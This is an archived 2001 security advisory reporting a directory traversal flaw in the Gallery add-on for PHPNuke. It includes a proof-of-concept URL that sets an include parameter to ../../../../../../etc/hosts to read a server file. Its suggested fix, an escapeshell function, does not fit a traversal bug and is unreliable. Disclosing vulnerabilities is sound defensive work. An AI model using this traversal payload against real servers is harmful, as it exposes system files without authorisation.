iSecureLabs Security Advisory - Cabezon Aurelien has discovered a reverse directory traversal vulnerability in the Gallery Addon for PHPNuke that allows users to view arbitrary files on the remote system that are owned or readable by the httpd daemon.
fb56723b90987185c743733ccbeb618508f8f8601f8af9aefd50e2cfd6a70c9dGallery Addon for PhpNuke remote file viewing vulnerability
Problem discovered: 18/10/2001 by Cabezon Aurélien |
aurelien.cabezon@iSecureLabs.com
[1] Description
Gallery is an intuitive web based photo gallery with authenticated users and
privileged albums.
Photo management includes automatic thumbnails, resizing, rotation, etc.
Gallery is available as a Nuke 5.0 module.
Gallery Addon is vulnerable to the ../.. bug that allow remote file reading
on the web server as whatever
user runs the web server.
[2] Exploit
http://www.somehost.com/modules.php?set_albumName=album01&id=aaw&op=modload&
name=gallery&file=index&inclu
de=../../../../../../etc/hosts
[3] Fix
Coder has been alerted.
An easy way to fix such a vulnerability is to use the PHP included "system
escapeshell" function.
[4] Informations bout Gallery Addon for PhpNuke
http://www.menalto.com/projects/gallery-nuke/
Author: bharat@menalto.com
---
Cabezon Aurélien
http://www.iSecureLabs.com
aurelien.cabezon@iSecureLabs.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed